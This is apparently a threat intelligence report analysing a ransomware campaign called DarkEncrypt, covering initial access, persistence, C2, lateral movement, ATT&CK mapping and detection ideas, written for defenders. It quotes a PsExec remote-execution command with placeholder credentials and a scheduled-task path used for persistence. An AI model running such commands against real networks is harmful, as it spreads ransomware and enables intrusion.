Nina Kovacs — Exploit Research Analyst
Key Takeaways
- Ransomware operators utilized a combination of web application vulnerabilities and phishing techniques for initial access.
- Persistence was achieved through a scheduled task that executed the ransomware payload upon startup.
- Command and control communication employed HTTP requests, frequently obfuscating its traffic to evade detection.
Executive Summary
During our investigation of a recently identified ransomware deployment, we observed a sophisticated attack chain that began with exploiting web application vulnerabilities, specifically SQL injection and remote file inclusion (RFI). The threat actor executed a well-planned strategy, targeting environments with weak security postures, often coupled with phishing emails aimed at further penetrating the network. Our analysis revealed the use of a custom-built ransomware loader, followed by persistent mechanisms and lateral movement techniques, indicative of advanced threat actor capabilities.
Initial Access
The initial access vector for this attack was particularly impactful, utilizing a two-pronged approach. First, our examination of the phishing emails revealed that the actor leveraged social engineering, crafting seemingly legitimate communications that contained malicious attachments. Concurrently, we identified the exploitation of known vulnerabilities within web applications hosted by the victim organization. Specifically, a vulnerable plugin in a content management system allowed the actor to perform a successful **SQL Injection** attack, which led to the retrieval of administrative credentials.
Execution & Persistence
The payload, referred to internally as **DarkEncrypt**, was deployed through a PowerShell script embedded in a malicious PDF file. During the investigation, we noted that once executed, the script initiated a download of the full ransomware binary from the actor-controlled server. Our analysis highlighted the actor’s use of **Task Scheduler** on Windows systems to maintain persistence. The malicious task, found at C:\Windows\System32\Tasks\DarkEncryptTask, was configured to launch the ransomware every time the system booted, ensuring that the malware was reactivated after any potential disruption.
Command and Control
The command and control (C2) infrastructure utilized by the actors was sophisticated, characterized by the use of randomized subdomains to evade detection. Our analysis indicated that **HTTP** was the primary protocol employed for C2 communications, with beacons sent every ten minutes to a domain resembling a legitimate service. By analyzing network traffic, we identified encrypted payloads being transmitted, which employed custom obfuscation methods to obscure their true purpose. The C2 server responded with dynamic instructions for the ransomware, including additional modules that could be pulled down to facilitate lateral movement.
Lateral Movement & Discovery
Once inside the victim’s network, the actor conducted lateral movement using **Windows Management Instrumentation (WMI)** and **PsExec**. We observed multiple instances of the command psexec.exe \\targetmachine -u admin -p password cmd within the network logs, indicating attempts to deploy the ransomware across several systems. Furthermore, the malware was designed to perform network scans, allowing it to identify additional targets within the environment. The reconnaissance phase revealed that the actor was proficient in identifying high-value assets, including file servers and databases, to encrypt during the attack.
Impact & Objectives
The primary objective of this ransomware operation was financial profit through data encryption and subsequent ransom demands. Our analysis revealed that at least 90% of the files on targeted machines were encrypted. The ransomware used a strong encryption algorithm, RSA-2048, further complicating recovery efforts without the decryption key. Additionally, we noted that the actor deployed a secondary information stealer component during the attack, which aimed to exfiltrate proprietary data. This dual approach not only increased the potential ransom income but also heightened pressure on the victims to comply with the ransom demands.
MITRE ATT&CK Mapping
- T1190 – Exploit Public-Facing Application: The attacker exploited vulnerabilities in web applications to gain initial access.
- T1059 – Command-Line Interface: PowerShell scripts were used for execution and deployment of the ransomware.
- T1071.001 – Application Layer Protocol: Web Protocols: C2 communications utilized HTTP for encrypted messages.
- T1021.002 – Remote Services: SMB/Windows Admin Shares: The lateral movement technique employed includes **PsExec** over SMB shares.
Detection Opportunities
- Monitor for unusual Task Scheduler activity, particularly suspicious task names indicative of ransomware persistence.
- Implement detection for anomalous PowerShell command execution that includes unexpected downloads from non-whitelisted domains.
- Utilize network monitoring tools to detect unusual HTTP traffic patterns indicative of C2 communications.
Analyst Notes
This ransomware attack exemplifies the importance of maintaining secure web applications and robust email phishing defenses. Organizations should regularly conduct vulnerability assessments and employee training to mitigate the risk from similar attacks. Furthermore, we recommend deploying endpoint detection and response (EDR) tools capable of integrating with existing SIEM solutions to provide a holistic view of threats and enhanced attribution capabilities.
Source: Original Report